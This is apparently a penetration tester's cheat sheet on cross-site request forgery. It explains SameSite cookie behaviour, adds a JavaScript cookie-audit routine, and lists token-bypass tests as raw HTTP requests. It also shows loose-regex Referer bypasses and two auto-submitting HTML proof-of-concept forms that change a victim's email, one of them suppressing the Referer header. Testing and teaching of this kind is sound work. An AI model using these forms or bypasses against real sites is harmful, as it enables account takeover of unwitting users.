CSRF

Criteria

The first thing to check when assessing CSRF is the SameSite attribute on the session cookie, since it decides whether the browser will attach the cookie to a cross-site request at all.

  • SameSite=Strict - the cookie is never sent on cross-site requests, so CSRF is not possible
  • SameSite=Lax - the cookie is sent only on top-level GET navigations, so CSRF is only possible via a GET request
  • SameSite=None - the cookie is sent on every cross-site request (modern browsers also require Secure), so CSRF is possible
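The decision table above, turned into a small audit routine. This is an added example, not code from the original page: it parses a Set-Cookie header and reports whether a cross-site POST or a cross-site top-level GET would carry the cookie, applying the Strict/Lax/None rules plus the Secure requirement for None. The cookie values are constructed sample data.

```javascript
// Added example (not from the original page): audit the SameSite attribute of a
// Set-Cookie header and report whether a cross-site request would carry the cookie.
//   Strict -> never sent on cross-site requests
//   Lax    -> sent only on top-level navigations with a safe method (GET)
//   None   -> sent on any cross-site request, but only when Secure is also set
// Absent  -> Chromium-based browsers treat it as Lax (with a short "Lax+POST"
//            grace window for freshly set cookies that this audit ignores).

function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    sameSite: null, // null means the attribute is absent
    secure: false,
    httpOnly: false,
  };
  for (const attr of attrs) {
    const [k, v = ""] = attr.split("=");
    const key = k.trim().toLowerCase();
    if (key === "samesite") cookie.sameSite = v.trim().toLowerCase();
    else if (key === "secure") cookie.secure = true;
    else if (key === "httponly") cookie.httpOnly = true;
  }
  return cookie;
}

// Would the browser attach this cookie to a cross-site request?
// topLevelGet=true models a link click or GET form from another site;
// topLevelGet=false models a POST form submission or fetch/XHR from another origin.
function sentCrossSite(cookie, { topLevelGet }) {
  const mode = cookie.sameSite;
  if (mode === "strict") return false;
  if (mode === "none") return cookie.secure; // None without Secure is rejected by modern browsers
  return topLevelGet; // "lax" or absent (defaults to Lax)
}

function auditCookie(header) {
  const c = parseSetCookie(header);
  return {
    name: c.name,
    sameSite: c.sameSite ?? "(absent, treated as Lax by default)",
    crossSitePost: sentCrossSite(c, { topLevelGet: false }),
    crossSiteTopLevelGet: sentCrossSite(c, { topLevelGet: true }),
  };
}

// Constructed sample headers (the session value is a placeholder, not a real token)
const samples = [
  "session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8; SameSite=Strict; Secure; HttpOnly",
  "session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8; SameSite=Lax; Secure",
  "session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8; SameSite=None; Secure",
  "session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8; Secure",
];
for (const h of samples) console.log(auditCookie(h));
```

The useful output is the pair of booleans per cookie: a Lax cookie shows `crossSitePost: false` but `crossSiteTopLevelGet: true`, which is exactly why a state-changing endpoint that accepts GET is still exploitable under Lax.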

The most common mistake developers make is not including a CSRF token at all, so the state-changing request below succeeds as-is when replayed from another site.

Request without any CSRF token:

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com

CSRF Token Bypasses

Check whether the CSRF token is actually validated by changing a single character of the csrf parameter and resending the request.

Original request:

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

Modified request (last character of the token changed):

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBB

Check whether validation is skipped entirely when the csrf parameter is removed from the request.

Original request:

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

Modified request (csrf parameter removed):

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com

Check whether validation depends on the request method by resubmitting the same parameters over GET; some frameworks only validate the token on POST.

Original request:

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

Modified request (method changed to GET, parameters moved to the query string):

GET /my-account/change-email?email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;

Referer Bypasses

Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. The following are mistakes developers make when they implement that check with a loose regex instead of comparing the parsed origin exactly.

1. Bad Regex: Subdomain (the expected domain is only matched as a prefix of the host)

https://target.com.shelled.io/change_email

2. Bad Regex: Query Parameter (the expected domain is matched anywhere in the URL, so it can be placed in the query string)

https://shelled.io/change_email?target.com


Other applications validate the Referer header when it is present in requests but skip the validation entirely if the header is omitted.

The following meta tag stops the browser from sending the Referer header with requests made from the page (never is the legacy keyword; the current standard equivalent is no-referrer).

<meta name="referrer" content="never">

PoC

<html>
    <body>
        <meta name="referrer" content="never">
        <form action="https://vulnerable-website.com/email/change" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
            <input type="hidden" name="csrf" value="WfF1szMUHhiokx9AHOfjRkE" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>


PoC (generic auto-submitting form, without Referer suppression)

<html>
    <body>
        <form action="https://vulnerable-website.com/email/change" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
            <input type="hidden" name="csrf" value="WfF1szMUHhiokx9AHOfjRkE" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>